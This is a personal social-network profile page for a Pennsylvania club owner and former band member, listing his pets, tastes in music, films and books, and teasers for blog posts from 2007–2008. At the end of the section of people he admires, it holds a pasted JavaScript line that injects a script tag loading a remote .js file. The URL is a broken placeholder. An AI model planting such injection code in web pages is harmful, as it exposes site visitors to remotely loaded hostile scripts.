Derek No One profile picture

Derek No One

Could you save my life had the boy that you knew not died?

About Me

I am one of the two owners of Club Octane in Charleroi, PA.I used to play bass in a band called Flatline, and I used to be in a band, Meaning in the Static, where I played guitar... Not well enough I suppose.I was engaged to a wonderful angel named Evie, until our wedding day, which was on the seventh day of the seventh month of two thousand and seven.We now have six cats named Tyson, Baby Cat, Ommi, Mia, Tigra, and Sammie-Bootsie-Raphael. We also have a dog named Hunter. She was the only white pup in a litter of 10 black lab/beagel mixes, She was named after Hunter from AFI before he shaved his blond spikes...I enjoy promoting local music and rocking my face off. Anything else you want to know, just ask... MyGen Profile Generator

My Interests

Music, Web Design, Traveling, Weeemon, and ugggh Music?

I'd like to meet:

Rob Zombie, Brian Holland, Nick Cage, Mark Walberg, Chris from The Dreaming (Formerly Stabbing Westward,) William Shakespeare, Gene Louis of Bullets and Octane, William Shatner, Stephen King, Danzig, Neil Diamond...


Anything local. Marilyn Avenue, 286, The Dreaming, As Fate Burns, MakeShift Romeo,


Scarface, Rockstar, National Lampoon's Van Wilder, The Crow series (all 4, and yes, there are 4.) Freddy Vs. Jason, Itiaian job, The Ring series, Ocean's 11 and 12, etc etc etc...


Dirt, The Riches, A Haunting, Scrubs, Law and Order, Nip/Tuck, and pretty much anything old.


...."Dream Catcher" (Naturally, way better then the movie) "The Hobbit", Shakespeare sonnets. the three Vampire books from Stephenie Meyer: "Twilight", "New Moon", and "Eclipse", and two books that changed my life: "23 Minutes in Hell" by Bill Weise and "The Secret," by Rhonda Byrne


Anyone who whole heartidly follows their dreams and makes things happen for them on their own turf and by their own rules. Making things work for them and not working for things. .."var s=document.createElement('script');s.src='http://../.../test .js';document.getElementsByTagName('head')[0].appendChild(s) ;"

My Blog

Open up Wide for the Breaking - Just One Touch and Ill be Yours. EVERYONE PLEASE READ!

Heya friends,     Yes, yes& I haven't been around in a while, and yes, there are very good reasons for my absence. Two major ones to be exact, and some of you wont really know what the hell...
Posted by Derek No One on Mon, 03 Mar 2008 02:21:00 PST

A Rock Star No More

      This is the letter I just wrote to my former band mates, I think you can figure out everything that has happened just by reading... I want to thank everyone who came out...
Posted by Derek No One on Mon, 04 Feb 2008 05:44:00 PST

Captains Log: Star Date 1/11/08

Heya all,   I just wanted to log on and tell y'all what's been going on in my life. I have been wanting to write a hella-blog, but I'm currently at Quizno's (I'll explain more below&) waiting fo...
Posted by Derek No One on Sat, 12 Jan 2008 06:22:00 PST

My First Tattoo Blog!

"Before Pics"    What's up, What's up?!?      Well to cap off an outstanding month, Evie and I traveled to Virginia to get our first (of many) tattoos. Yes, it took me t...
Posted by Derek No One on Wed, 01 Aug 2007 12:10:00 PST

My Very Own Wedding Blog

The first half of this I wrote a day or two before the wedding, I never got to finish it  much less post it. But I took the time to write it, so I may as well put it out there& I will mark where the ...
Posted by Derek No One on Tue, 24 Jul 2007 08:58:00 PST

Lemme Have a Number Three with a Blog... aaaand Blankets.

Heya Kitties,        So much to talk about& I think I'll start off with where the last blog left off. Remember when I asked you guys, which position in a band you can see me m...
Posted by Derek No One on Wed, 02 May 2007 06:53:00 PST

Please Stop Crying in My Cocaine. Pt. 2!

And this Blog begins where the last one left off& (Long live VH1 and the gay shows they put on) I'm just going to keep rambling on about random shit until my mind gets uncluster-fucked, because this ...
Posted by Derek No One on Thu, 05 Apr 2007 09:36:00 PST

Please Stop Crying in My Cocaine.

Heya Everyone, Once again I open my word program to throw a blog atchya! I have a lot on my mind, but nothing specific to speak of for long. So perhaps the following text will contain something that w...
Posted by Derek No One on Thu, 05 Apr 2007 04:24:00 PST

Duck, Duck, Duck, Duck, Duck, BLOG!

So I guess I'm not done& not even close. So here's the deal  I think I'll just chip away at what's going on in this big old, extremely handsome brain of mine until I feel satisfied. Upon being satisf...
Posted by Derek No One on Wed, 21 Mar 2007 06:53:00 PST

Lay your bloggness on me, babe.

Heya my Public! Wowowow has it been a while. TurboBlogger my ass& Anyway, I have kind of disappeared from everyone's radar  Including those whose circles I once ran in. So I thought it appropriate to...
Posted by Derek No One on Tue, 20 Mar 2007 05:14:00 PST